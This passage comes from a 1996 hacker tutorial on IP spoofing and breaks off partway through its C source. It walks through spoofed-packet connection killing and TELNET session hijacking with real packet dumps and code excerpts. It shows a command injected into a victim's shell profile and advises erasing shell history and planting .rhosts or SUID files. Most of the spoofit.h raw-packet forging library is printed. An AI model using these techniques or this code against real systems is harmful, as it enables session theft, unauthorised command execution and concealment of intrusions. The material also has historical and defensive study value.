TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
SEQ (hex): 19C6B998 ACK (hex): 69C5473F
FLAGS: -A---- Window: 3400
(data removed because irrelevant)
4) host A now has flushed its buffer and on his turn FIN's the connection.
(A->B)
sniper, intercepts this packet and now knows the hosts fell for the
spoof and the killing was a success!
(host A will no longer accept any data)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
SEQ (hex): 19C6B998 ACK (hex): 69C5473F
FLAGS: -A---F Window: 3400
(data removed because irrelevant)
5) We impersonated B, making A believe we had no further data. But B
doesn't know that and continues to send packets.
(B->A)
host A has that connection closed, and thus thinks the real packets of
B are spoofed (or at least bogus)! So host A sends some reset packets
(RST).
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.1072-166.66.66.1.23
SEQ (hex): 69C5473E ACK (hex): 19C6B98D
FLAGS: -A---- Window: 3750
(data removed because irrelevant)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
SEQ (hex): 19C6B98D FLAGS: ---R--
(data removed because irrelevant)
6) This goes on for a couple of packets.
Discussion of the program (numbers correspond with those of 'An Actual
Attack'):
1) stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,ACK,10);
if(stat==-1) {printf("Connection 10 secs idle... timeout.\n");exit(1);}
We use wait_packet on a non blocking socket. This way we can enable a
10 seconds timeout. This functions returns when the correct packet
has been delivered (or timeout).
2) sp_seq=pinfo.ack;
sp_ack=pinfo.seq+pinfo.datalen;
transmit_TCP (fd_send, NULL,0,0,0,DEST,DEST_P,SOURCE,SOURCE_P,
sp_seq,sp_ack,ACK|FIN);
We calculate a spoofed SEQ/ACK, and fire off a fake FIN packet. As we
don't send any data with it, our buffer is set to NULL and datalength
to 0.
NOTE together with FIN, you need to enable ACK.
3) N/A
4) stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,FIN,5);
if(stat>=0)
{printf("Killed the connection...\n");
exit(0);}
We wait for a FIN packet (note the FIN in wait_packet). We use a 5
sec. timeout, if the function returns and stat>=0 (-1 on timeout), we
know our attempt was successfull.
5) N/A
6) N/A
NOTE We can have the same problem here as with the RST killer. But didn't
have it here, because the packet we responded upon was the end of a
data stream (in fact it was an echo from a shell command)
4.3.3 Improving
---------------
Except from multipacket firing, it is advised to launch 2 attacks (one in
both ways). This illiminates one side oriented connections to be handled
optimally. I think of things like downloading data, which is a one way
data-flow, it is much easier sending a RST from the (spoofed) receiver to
the sender, then the other way around.
Those 2 attacks could both impersonate host A and B, and thus giving is 4
times more chance of a succesfull kill.
I'll leave further experimenting up to you (use your imagination to handle
different situations).
4.4 Connection Hijacking
------------------------
Setup:
host A <------X------------------------->host B
| A,B have a TCP connection running (TELNET)
host S <------/ A,S on same subnet
Concept:
(suppose a TELNET from A (client) to B (server))
TCP separates good and bogus packets by their SEQ/ACK numbers i.e. B
trusts the packets from A because of its correct SEQ/ACK numbers.
So if there was a way to mess up A's SEQ/ACK, B would stop believing A's
real packets.
We could then impersonate to be A, but using correct SEQ/ACK numbers
(that is numbers correct for B).
We would now have taken over the connection (host A is confused, B thinks
nothings wrong (almost correct, see 'actual attack'), and S sends
'correct' data to B).
This is called 'Hijacking' a connection. (generally hijacking a TELNET session,
but same could be done woth FTP, RLOGIN, etc...)
How could we mess up A's SEQ/ACK numbers? Well by simply inserting a data
packet into the stream at the right time (S as A->B), the server B would
accept this data, and update ACK numbers, A would continue to send
it's old SEQ numbers, as it's unaware of our spoofed data.
Use:
I allready hear you wiseguys yelling: "Hey dude, why hijack a connection
if you can sniff those packets anyway??"
Well, anybody heared of One Time Passwords, Secure Key?? Case closed....
(S/Key: server challenges client, client and server calculate a code from
the challenge and password, and compare that code. The password itself is
never send on the cable, so you can't sniff sh!t).
(OTP: server has a list of passwords, once one is used, it is destroyed,
so sniffing gets you a password that has 'just' expired ;)
(ALL types of identification that happen at connection (encrypted or not,
trusted or not), and don't use encrypted data transfer, are vulnerable to
'hijacking'.)
An actual attack:
(These are real sniffed packets, although IP numbers of hosts were changed)
(suppose a TELNET from A (client) to B (server))
host A : 166.66.66.1
host B : 111.11.11.11
(S on same subnet as A)
1) connection running...
we look with sniffit, and see he's busy in a shell, we start 'hijack'
on host S as 'hijack 166.66.66.1 2035 111.11.11.11'
a packet containing from (A->B) is detected... hijack takes action...
(A->B)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
SEQ (hex): 5C8223EA ACK (hex): C34A67F6
FLAGS: -AP--- Window: 7C00
Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
45 E 00 . 00 . 29 ) CA . F3 . 40 @ 00 . 40 @ 06 . C5 . 0E . 9D . C1 . 45 E 3F ?
9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # EA . C3 . 4A J 67 g F6 .
50 P 18 . 7C | 00 . 6D m 29 ) 00 . 00 . 6C l
~~~~
2) host B (server) echo's that databyte (typing 'l' in a bash shell!!!)
(you gotta know what you are doing)
(B->A)
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
SEQ (hex): C34A67F6 ACK (hex): 5C8223EB
FLAGS: -AP--- Window: 2238
Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
45 E 00 . 00 . 29 ) B5 . BD . 40 @ 00 . FC . 06 . 1E . 44 D 9D . C1 . 2A * 0B .
9D . C1 . 45 E 3F ? 00 . 17 . 04 . 10 . C3 . 4A J 67 g F6 . 5C \ 82 . 23 # EB .
50 P 18 . 22 " 38 8 C6 . F0 . 00 . 00 . 6C l
~~~~
3) A simple ACK from host A to B responding to that echo. Because we know
this can come, and we know a simple ACK doesn't contain data, we don't
need this for SEQ/ACK calculation.
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
SEQ (hex): 5C8223EB ACK (hex): C34A67F7
FLAGS: -A---- Window: 7C00
(data removed because irrelevant)
4) Now we impersonate further data (following packet 1). (S as A -> B)
We calculate SEQ/ACK out of packet 1, NOT out of the 'echo' from B,
because we have to be as fast as possible, and packet 2 could be slow.
We send some backspaces and some enters. To clean up the command line.
We will probably still get some error message back from the shell.
But we handle that too! (see sourcecode)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
SEQ (hex): 5C8223EB ACK (hex): C34A67F6
FLAGS: -AP--- Window: 7C00
Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
45 E 00 . 00 . 32 2 31 1 01 . 00 . 00 . 45 E 06 . 99 . F8 . 9D . C1 . 45 E 3F ?
9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # EB . C3 . 4A J 67 g F6 .
50 P 18 . 7C | 00 . AE . F5 . 00 . 00 . 08 . 08 . 08 . 08 . 08 . 08 . 08 . 08 .
0A . 0A .
5) This is the echo of our spoofed data. Look at ACK. (B->A)
5C8223F5 = 5C8223EB + 0A (this is how we detect that the spoof was a
success)
NOTE that at this point the connection is ours, and A's SEQ/ACK
numbers are completely f#cked up according to B.
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
SEQ (hex): C34A67F7 ACK (hex): 5C8223F5
FLAGS: -AP--- Window: 2238
Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
45 E 00 . 00 . 3C < B5 . BE . 40 @ 00 . FC . 06 . 1E . 30 0 9D . C1 . 2A * 0B .
9D . C1 . 45 E 3F ? 00 . 17 . 04 . 10 . C3 . 4A J 67 g F7 . 5C \ 82 . 23 # F5 .
50 P 18 . 22 " 38 8 26 & 7C | 00 . 00 . 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H
5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 0D . 0A . 0D . 0A .
6) Hijack will now try to get on track of SEQ/ACK numbers again, to send
the data we want to be executed.
NOTE each time a packet 'out of numbering' arrives the host should
answer with correct SEQ/ACK, this provides us with the certainty
that a lot of packets are going to be send with correct (and not
changing) SEQ/ACK nrs. (this is where the mechanism of getting our
numbers back straight is based upon)
NOTE it's at this point the real TELNET client's session hangs, most
people ignore this and re-login after a few secs, accepting the
accident as Murphy's law.
(Well it *can* happen without any spoofing involved)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
SEQ (hex): 5C8223EB ACK (hex): C34A67F7
FLAGS: -AP--- Window: 7C00
(data removed because irrelevant)
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
SEQ (hex): C34A680B ACK (hex): 5C8223F5
FLAGS: -A---- Window: 2238
(data removed because irrelevant)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-157.193.42.11.23
SEQ (hex): 5C8223EB ACK (hex): C34A67F7
FLAGS: -AP--- Window: 7C00
(data removed because irrelevant)
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
SEQ (hex): C34A680B ACK (hex): 5C8223F5
FLAGS: -A---- Window: 2238
(data removed because irrelevant)
7) We are back on track (or at least hijack is, because this is going
very fast). And we fire off our faked bash command.
echo "echo HACKED" >> $HOME/.profile<ENTER>
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
SEQ (hex): 5C8223F5 ACK (hex): C34A680B
FLAGS: -AP--- Window: 7C00
Packet ID (from_IP.port-to_IP.port): 166.66.66.1-111.11.11.11.23
45 E 00 . 00 . 4D M 31 1 01 . 00 . 00 . 45 E 06 . 99 . DD . 9D . C1 . 45 E 3F ?
9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # F5 . C3 . 4A J 68 h 0B .
50 P 18 . 7C | 00 . 5A Z B6 . 00 . 00 . 65 e 63 c 68 h 6F o 20 22 " 65 e 63 c
68 h 6F o 20 48 H 41 A 43 C 4B K 45 E 44 D 22 " 20 3E > 3E > 24 $ 48 H 4F O
4D M 45 E 2F / 2E . 70 p 72 r 6F o 66 f 69 i 6C l 65 e 0A . 00 .
8) now we wait for this data to be confirmed.
ACK = 5C8223F5 + 025 (=37 bytes)
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
SEQ (hex): C34A680B ACK (hex): 5C82241A
FLAGS: -AP--- Window: 2238
Packet ID (from_IP.port-to_IP.port): 157.193.42.11.23-157.193.69.63.1040
(data removed because irrelevant)
9) The connection runs on. Now you can execute more commands (just stay
on track of SEQ/ACK), and even finnish the connection (with the same
mechanism of sniper, or with sniper itself... here FIN is recommended).
NOTE: here it is important to be in a shell. But if you have been
watching someone, and you notice he's always directly going to
'pine' and you can't get inbetween on time.
NO PROBS.... just make a cleanup string that cleans up
'pine' and puts you back in the shell. (some control chars,
hotkeys, whatever....)
NOTE: if you clean up the .sh_history of .bash_history (whatever) this
attack is one of the nicest there is. Another advantage above
sniffing.
NOTE: Noone says you have to make a .rhosts file (rlogin and
family might be disabled), you can change permissions, put
stuff SUID, put it public, install stuff, mail, etc..
Discussion of the program (numbers correspond with those of 'An Actual
Attack'):
1) wait_packet(fd_receive,&attack_info,CLIENT, CLIENT_P, SERVER, 23,ACK|PSH,0);
Waiting for actual data (PSH is always used for packets containing
data in interactive services like TELNET)
2) N/A
3) N/A
4) sp_seq=attack_info.seq+attack_info.datalen;
sp_ack=attack_info.ack;
transmit_TCP(fd_send, to_data,0,0,sizeof(to_data),CLIENT, CLIENT_P, SERVER,
23,sp_seq,sp_ack,ACK|PSH);
We recalculate the sequence number (using SEQ and datalength of packet 1)
an we send a spoofed packet with ACK and PSH flag, containing the
cleanup data in to_data.
5) while(count<5)
{
wait_packet(fd_receive, &attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0);
if(attack_info.ack==sp_seq+sizeof(to_data))
count=PERSONAL_TOUCH;
else count++;
};
We wait for a confirmation that our spoofed sequence is accepted. We
expect a packet with an ACK set (PSH or not). It should come within 5
packets, we use this limit, because we should be able to handle some
previous ACK packets!
NOTE we don't check SEQ nrs, because we have no clue of what they are
going to be (data might have been send our way, or not).
6) while(count<10)
{
old_seq=serv_seq;
old_ack=serv_ack;
wait_packet(fd_receive,&attack_info,SERVER, 23, CLIENT, CLIENT_P,
ACK,0);
if(attack_info.datalen==0)
{
serv_seq=attack_info.seq+attack_info.datalen;
serv_ack=attack_info.ack;
if( (old_seq==serv_seq)&&(serv_ack==old_ack) )
count=PERSONAL_TOUCH;
else count++;
}
};
To get back on track, we try to receive 2 ACK packets without data
with the same SEQ/ACK. We know enough packets will be send as a
response to incorrect packets from the confused host A.
This is how we get back on track.
NOTE In a case where A completely gave up, simple spoof a packet with
incorrect SEQ/ACK to get the correct numbers back.
7) transmit_TCP(fd_send, evil_data,0,0,sizeof(evil_data),CLIENT,CLIENT_P,
SERVER,23,serv_ack,serv_seq,ACK|PSH);
Pretty clear....
8) while(count<5)
{
wait_packet(fd_receive,&attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0);
if(attack_info.ack==serv_ack+sizeof(evil_data))
count=PERSONAL_TOUCH;
else count++;
};
and again waiting for confirmation.
NOTE after the above attack, hijack had produced the following output:
Starting Hijacking demo - Brecht Claerhout 1996
-----------------------------------------------
Takeover phase 1: Stealing connection.
Sending Spoofed clean-up data...
Waiting for spoof to be confirmed...
Phase 1 ended.
Takeover phase 2: Getting on track with SEQ/ACK's again
Server SEQ: C34A680B (hex) ACK: 5C8223F5 (hex)
Phase 2 ended.
Takeover phase 3: Sending MY data.
Sending evil data.
Waiting for evil data to be confirmed...
Phase 3 ended.
4.5 Other
---------
This list is far from complete, I'm sure you can think of other nice things
to do with this information, think, experiment and code!
5. The source code
------------------
---=[ spoofit.h ]=------------------------------------------------------------
/**************************************************************************/
/* Spoofit.h - Include file for easy creating of spoofed TCP packets */
/* Requires LINUX 1.3.x (or later) Kernel */
/* (illustration for 'A short overview of IP spoofing') */
/* V.1 - Copyright 1996 - Brecht Claerhout */
/* */
/* Purpose - Providing skilled people with a easy to use spoofing source */
/* I used it to be able to write my tools fast and short. */
/* Mind you this is only illustrative and can be easily */
/* optimised. */
/* */
/* Author - Dr_Sp00f (Himself) */
/* Serious advice, comments, statements, greets, always welcome */
/* flames, moronic 3l33t >/dev/null */
/* */
/* Disclaimer - This file is for educational purposes only. I am in */
/* NO way responsible for what you do with this file, */
/* or any damage you or this file causes. */
/* */
/* For whom - People with a little knowledge of TCP/IP, C source code */
/* and general UNIX. Otherwise, please keep your hands of, */
/* and catch up on those things first. */
/* */
/* Limited to - Linux 1.3.X or higher. */
/* If you know a little about your OS, shouldn't be to hard */
/* to port. */
/* */
/* Important note - You might have noticed I use non standard packet */
/* header struct's. How come?? Because I started like */
/* that on Sniffit because I wanted to do the */
/* bittransforms myself. */
/* Well I got so damned used to them, I keep using them, */
/* they are not very different, and not hard to use, so */
/* you'll easily use my struct's without any problem, */
/* this code and the examples show how to use them. */
/* my apologies for this inconvenience. */
/* */
/* None of this code can be used in commercial software. You are free to */
/* use it in any other non-commercial software (modified or not) as long */
/* as you give me the credits for it. You can spread this include file, */
/* but keep it unmodified. */
/* */
/**************************************************************************/
/* */
/* Easiest way to understand this library is to look at the use of it, in */
/* the example progs. */
/* */
/**** Sending packets *****************************************************/
/* */
/* int open_sending (void) */
/* Returns a filedescriptor to the sending socket. */
/* close it with close (int filedesc) */
/* */
/* void transmit_TCP (int sp_fd, char *sp_data, */
/* int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen, */
/* char *sp_source, unsigned short sp_source_port, */
/* char *sp_dest,unsigned short sp_dest_port, */
/* unsigned long sp_seq, unsigned long sp_ack, */
/* unsigned short sp_flags) */
/* fire data away in a TCP packet */
/* sp_fd : raw socket filedesc. */
/* sp_data : IP options (you should do the padding) */
/*
TCP options (you should do the padding) */
/* data to be transmitted */
/* (NULL is nothing) */
/* note that all is optional, and IP en TCP options are*/
/* not often used. */
/* All data is put after eachother in one buffer. */
/* sp_ipoptlen : length of IP options (in bytes) */
/* sp_tcpoptlen : length of TCP options (in bytes) */
/* sp_datalen : amount of data to be transmitted (bytes) */
/* sp_source : spoofed host that"sends packet" */
/* sp_source_port: spoofed port that "sends packet" */
/* sp_dest : host that should receive packet */
/* sp_dest_port : port that should receive packet */
/* sp_seq : sequence number of packet */
/* sp_ack : ACK of packet */
/* sp_flags : flags of packet (URG,ACK,PSH,RST,SYN,FIN) */
/* */
/* void transmit_UDP (int sp_fd, char *sp_data, */
/* int sp_ipoptlen, int sp_datalen, */
/* char *sp_source, unsigned short sp_source_port, */
/* char *sp_dest, unsigned short sp_dest_port) */
/* fire data away in an UDP packet */
/* sp_fd : raw socket filedesc. */
/* sp_data : IP options */
/* data to be transmitted */
/* (NULL if none) */
/* sp_ipoptlen : length of IP options (in bytes) */
/* sp_datalen : amount of data to be transmitted */
/* sp_source : spoofed host that"sends packet" */
/* sp_source_port: spoofed port that "sends packet" */
/* sp_dest : host that should receive packet */
/* sp_dest_port : port that should receive packet */
/* */
/**** Receiving packets ***************************************************/
/* */
/* int open_receiving (char *rc_device, char mode) */
/* Returns fdesc to a receiving socket */
/* (if mode: IO_HANDLE don't call this twice, global var */
/* rc_fd_abc123 is initialised) */
/* rc_device: the device to use e.g. "eth0", "ppp0" */
/* be sure to change DEV_PREFIX accordingly! */
/* DEV_PREFIX is the length in bytes of the header that */
/* comes with a SOCKET_PACKET due to the network device */
/* mode: 0: normal mode, blocking, (read will wait till packet */
/* comes, mind you, we are in PROMISC mode) */
/* IO_NONBLOCK: non-blocking mode (read will not wait till */
/* usefull for active polling) */
/* IO_HANDLE installs the signal handler that updates SEQ,ACK,..*/
/* (IO_HANDLE is not recommended to use, as it should be */
/* modified according to own use, and it works bad on heavy */
/* traffic continuous monitoring. I needed it once, but left it */
/* in to make you able to have a look at Signal handled IO, */
/* personally I would have removed it, but some thought it */
/* doesn't do any harm anyway, so why remove... ) */
/* (I'm not giving any more info on IO_HANDLE as it is not */
/* needed for the example programs, and interested people can */
/* easilythey figure the code out theirselves.) */
/* (Besides IO_HANDLE can only be called ONCE in a program, */
/* other modes multiple times) */
/* */
/* int get_packet (int rc_fd, char *buffer, int *TCP_UDP_start, */
/* unsigned char *proto) */
/* This waits for a packet (mode default) and puts it in buffer or */
/* returns whether there is a pack or not (IO_NONBLOCK). */
/* It returns the packet length if there is one available, else 0 */
/* */
/* int wait_packet(int wp_fd,struct sp_wait_packet *ret_values, */
/* char *wp_source, unsigned short wp_source_port, */
/* char *wp_dest, unsigned short wp_dest_port, */
/* int wp_flags, int wait_time); */
/* wp_fd: a receiving socket (default or IO_NONBLOCK) */
/* ret_values: pointer to a sp_wait_packet struct, that contains SEQ, */
/* ACK, flags, datalen of that packet. For further packet */
/* handling see the examples. */
/* struct sp_wait_packet { */
/* unsigned long seq,ack; */
/* unsigned short flags; */
/* int datalen; */
/* }; */
/* wp_source, wp_source_port : sender of packet */
/* wp_dest, wp_dest_port : receiver of packet */
/* wp_flags: flags that should be present in packet.. (mind you there */
/* could be more present, so check on return) */
/* note: if you don't care about flag, use 0 */
/* wait_time: if not zero, this function will return -1 if no correct */
/* packet has arrived within wait_time secs. */
/* (only works on IO_NONBLOCK socket) */
/* */
/* void set_filter (char *f_source, unsigned short f_source_port, */
/* char *f_dest, unsigned short f_dest_port) */
/* (for use with IO_HANDLE) */
/* Start the program to watch all trafic from source/port to */
/* dest/port. This enables the updating of global data. Can */
/* be called multiple times. */
/* */
/* void close_receiving (void) */
/* When opened a IO_HANDLE mode receiving socket close it with */
/* this. */
/* */
/**** Global DATA (IO_HANDLE mode) ****************************************/
/* */
/* When accessing global data, copy the values to local vars and then use */
/* them. Reduce access time to a minimum. */
/* Mind you use of this is very limited, if you are a novice on IO, just */
/* ignore it, the other functions are good enough!). If not, rewrite the */
/* handler for your own use... */
/* */
/* sig_atomic_t SP_DATA_BUSY */
/* Put this on NON-ZERO when accesing global data. Incoming */
/* packets will be ignored then, data can not be overwritten. */
/* */
/* unsigned long int CUR_SEQ, CUR_ACK; */
/* Last recorded SEQ and ACK number of the filtered "stream". */
/* Before accessing this data set SP_DATA_BUSY non-zero, */
/* afterward set it back to zero. */
/* */
/* unsigned long int CUR_COUNT; */
/* increased everytime other data is updated */
/* */
/* unsigned int CUR_DATALEN; */
/* Length of date in last TCP packet */
/* */
/**************************************************************************/
#include "sys/socket.h" /* includes, what would we do without them */
#include "netdb.h"
#include "stdlib.h"
#include "unistd.h"
#include "stdio.h"
#include "errno.h"
#include "netinet/in.h"
#include "netinet/ip.h"
#include "linux/if.h"
#include "sys/ioctl.h"
#include "sys/types.h"
#include "signal.h"
#include "fcntl.h"
#undef DEBUG
#define IP_VERSION 4 /* keep y'r hands off... */
#define MTU 1500
#define IP_HEAD_BASE 20 /* using fixed lengths to send */
#define TCP_HEAD_BASE 20 /* no options etc... */
#define UDP_HEAD_BASE 8 /* Always fixed */
#define IO_HANDLE 1
#define IO_NONBLOCK 2
int DEV_PREFIX = 9999;
sig_atomic_t WAIT_PACKET_WAIT_TIME=0;
/**** IO_HANDLE ************************************************************/
int rc_fd_abc123;
sig_atomic_t RC_FILTSET=0;
char rc_filter_string[50]; /* x.x.x.x.p-y.y.y.y.g */
sig_atomic_t SP_DATA_BUSY=0;
unsigned long int CUR_SEQ=0, CUR_ACK=0, CUR_COUNT=0;
unsigned int CUR_DATALEN;
unsigned short CUR_FLAGS;
/***************************************************************************/
struct sp_wait_packet
{
unsigned long seq,ack;
unsigned short flags;
int datalen;
};
/* Code from Sniffit - BTW my own program.... no copyright violation here */
#define URG 32 /* TCP flags */
#define ACK 16
#define PSH 8
#define RST 4
#define SYN 2
#define FIN 1
struct PACKET_info
{
int len, datalen;
unsigned long int seq_nr, ACK_nr;
u_char FLAGS;
};
struct IP_header /* The IPheader (without options) */
{
unsigned char verlen, type;
unsigned short length, ID, flag_offset;
unsigned char TTL, protocol;
unsigned short checksum;
unsigned long int source, destination;
};
struct TCP_header /* The TCP header (without options) */
{
unsigned short source, destination;
unsigned long int seq_nr, ACK_nr;
unsigned short offset_flag, window, checksum, urgent;
};
struct UDP_header /* The UDP header */
{
unsigned short source, destination;
unsigned short length, checksum;
};
struct pseudo_IP_header /* The pseudo IP header (checksum calc) */
{
unsigned long int source, destination;
char zero_byte, protocol;
unsigned short TCP_UDP_len;
};
/* data structure for argument passing */
struct sp_data_exchange {
int fd; /* Sh!t from transmit_TCP */
char *data;
int datalen;
char *source; unsigned short source_port;
char *dest; unsigned short dest_port;
unsigned long seq, ack;
unsigned short flags;
char *buffer; /* work buffer */
int IP_optlen; /* IP options length in bytes */
int TCP_optlen; /* TCP options length in bytes */
};
/**************** all functions *******************************************/
void transmit_TCP (int fd, char *sp_data,
int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen,
char *sp_source, unsigned short sp_source_port,
char *sp_dest, unsigned short sp_dest_port,
unsigned long sp_seq, unsigned long sp_ack,
unsigned short sp_flags);
void transmit_UDP (int sp_fd, char *sp_data,
int ipoptlen, int sp_datalen,
char *sp_source, unsigned short sp_source_port,
char *sp_dest, unsigned short sp_dest_port);
int get_packet (int rc_fd, char *buffer, int *, unsigned char*);
int wait_packet(int,struct sp_wait_packet *,char *, unsigned short,char *, unsigned short, int, int);
static unsigned long sp_getaddrbyname(char *);
int open_sending (void);
int open_receiving (char *, char);
void close_receiving (void);
void sp_send_packet (struct sp_data_exchange *, unsigned char);
void sp_fix_TCP_packet (struct sp_data_exchange *);
void sp_fix_UDP_packet (struct sp_data_exchange *);
void sp_fix_IP_packet (struct sp_data_exchange *, unsigned char);
unsigned short in_cksum(unsigned short *, int );
void rc_sigio (int);
void set_filter (char *, unsigned short, char *, unsigned short);
/********************* let the games commence ****************************/
static unsigned long sp_getaddrbyname(char *sp_name)
{
struct hostent *sp_he;
int i;
if(isdigit(*sp_name))
return inet_addr(sp_name);
for(i=0;i<100;i++)
{
if(!(sp_he = gethostbyname(sp_name)))
{printf("WARNING: gethostbyname failure!\n");
sleep(1);
if(i>=3) /* always a retry here in this kind of application */
printf("Coudn't resolv hostname."), exit(1);
}
else break;
}
return sp_he ? *(long*)*sp_he->h_addr_list : 0;
}
int open_sending (void)
{
struct protoent *sp_proto;
int sp_fd;
int dummy=1;
/* they don't come rawer */
if ((sp_fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))==-1)
perror("Couldn't open Socket."), exit(1);
#ifdef DEBUG
printf("Raw socket ready\n");
#endif
return sp_fd;
}
void sp_send_packet (struct sp_data_exchange *sp, unsigned char proto)
{
int sp_status;
struct sockaddr_in sp_server;
struct hostent *sp_help;
int HEAD_BASE;
/* Construction of destination */
bzero((char *)&sp_server, sizeof(struct sockaddr));
sp_server.sin_family = AF_INET;
sp_server.sin_addr.s_addr = inet_addr(sp->dest);
if (sp_server.sin_addr.s_addr == (unsigned int)-1)
{ /* if target not in DOT/number notation */
if (!(sp_help=gethostbyname(sp->dest)))
fprintf(stderr,"unknown host %s\n", sp->dest), exit(1);
bcopy(sp_help->h_addr, (caddr_t)&sp_server.sin_addr, sp_help->h_length);
};
switch(proto)
{
case 6: HEAD_BASE = TCP_HEAD_BASE; break; /* TCP */
case 17: HEAD_BASE = UDP_HEAD_BASE; break; /* UDP */
default: exit(1); break;
};
sp_status = sendto(sp->fd, (char *)(sp->buffer), sp->datalen+HEAD_BASE+IP_HEAD_BASE+sp->IP_optlen, 0,
(struct sockaddr *)&sp_server,sizeof(struct sockaddr));
if (sp_status < 0 || sp_status != sp->datalen+HEAD_BASE+IP_HEAD_BASE+sp->IP_optlen)
{
if (sp_status < 0)
perror("Sendto"), exit(1);
printf("hmm... Only transmitted %d of %d bytes.\n", sp_status,
sp->datalen+HEAD_BASE);
};
#ifdef DEBUG
printf("Packet transmitted...\n");
#endif
}
void sp_fix_IP_packet (struct sp_data_exchange *sp, unsigned char proto)
{
struct IP_header *sp_help_ip;
int HEAD_BASE;
switch(proto)
{
case 6: HEAD_BASE = TCP_HEAD_BASE; break; /* TCP */
case 17: HEAD_BASE = UDP_HEAD_BASE; break; /* UDP */
default: exit(1); break;
};
sp_help_ip = (struct IP_header *) (sp->buffer);
sp_help_ip->verlen = (IP_VERSION << 4) | ((IP_HEAD_BASE+sp->IP_optlen)/4);
sp_help_ip->type = 0;
sp_help_ip->length = htons(IP_HEAD_BASE+HEAD_BASE+sp->datalen+sp->IP_optlen+sp->TCP_optlen);
sp_help_ip->ID = htons(12545); /* TEST */
sp_help_ip->flag_offset = 0;
sp_help_ip->TTL = 69;
sp_help_ip->protocol = proto;
sp_help_ip->source = sp_getaddrbyname(sp->source);
sp_help_ip->destination = sp_getaddrbyname(sp->dest);
sp_help_ip->checksum=in_cksum((unsigned short *) (sp->buffer),
IP_HEAD_BASE+sp->IP_optlen);
#ifdef DEBUG
printf("IP header fixed...\n");
#endif
}
void sp_fix_TCP_packet (struct sp_data_exchange *sp)
{
char sp_pseudo_ip_construct[MTU];
struct TCP_header *sp_help_tcp;
struct pseudo_IP_header *sp_help_pseudo;
int i;
for(i=0;i<MTU;i++)
{sp_pseudo_ip_construct[i]=0;}
sp_help_tcp = (struct TCP_header *) (sp->buffer+IP_HEAD_BASE+sp->IP_optlen);
sp_help_pseudo = (struct pseudo_IP_header *) sp_pseudo_ip_construct;
sp_help_tcp->offset_flag = htons( (((TCP_HEAD_BASE+sp->TCP_optlen)/4)<<12) | sp->flags);
sp_help_tcp->seq_nr = htonl(sp->seq);
sp_help_tcp->ACK_nr = htonl(sp->ack);
sp_help_tcp->source = htons(sp->source_port);
sp_help_tcp->destination = htons(sp->dest_port);
sp_help_tcp->window = htons(0x7c00); /* dummy for now 'wujx' */
sp_help_pseudo->source = sp_getaddrbyname(sp->source);
sp_help_pseudo->destination = sp_getaddrbyname(sp->dest);
sp_help_pseudo->zero_byte = 0;
sp_help_pseudo->protocol = 6;
sp_help_pseudo->TCP_UDP_len = htons(sp->datalen+TCP_HEAD_BASE+sp->TCP_optlen);
memcpy(sp_pseudo_ip_construct+12, sp_help_tcp, sp->TCP_optlen+sp->datalen+TCP_HEAD_BASE);
sp_help_tcp->checksum=in_cksum((unsigned short *) sp_pseudo_ip_construct,
sp->datalen+12+TCP_HEAD_BASE+sp->TCP_optlen);
#ifdef DEBUG
printf("TCP header fixed...\n");
#endif
}
void transmit_TCP (int sp_fd, char *sp_data,
int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen,
char *sp_source, unsigned short sp_source_port,
char *sp_dest, unsigned short sp_dest_port,
unsigned long sp_seq, unsigned long sp_ack,
unsigned short sp_flags)
{
char sp_buffer[1500];
struct sp_data_exchange sp_struct;
bzero(sp_buffer,1500);
if (sp_ipoptlen!=0)
memcpy(sp_buffer+IP_HEAD_BASE,sp_data,sp_ipoptlen);
if (sp_tcpoptlen!=0)
memcpy(sp_buffer+IP_HEAD_BASE+TCP_HEAD_BASE+sp_ipoptlen,
sp_data+sp_ipoptlen,sp_tcpoptlen);
if (sp_datalen!=0)
memcpy(sp_buffer+IP_HEAD_BASE+TCP_HEAD_BASE+sp_ipoptlen+sp_tcpoptlen,
sp_data+sp_ipoptlen+sp_tcpoptlen,sp_datalen);
sp_struct.fd = sp_fd;
sp_struct.data = sp_data;
sp_struct.datalen = sp_datalen;
sp_struct.source = sp_source;
sp_struct.source_port = sp_source_port;
sp_struct.dest = sp_dest;
sp_struct.dest_port = sp_dest_port;
sp_struct.seq = sp_seq;
sp_struct.ack = sp_ack;
sp_struct.flags = sp_flags;
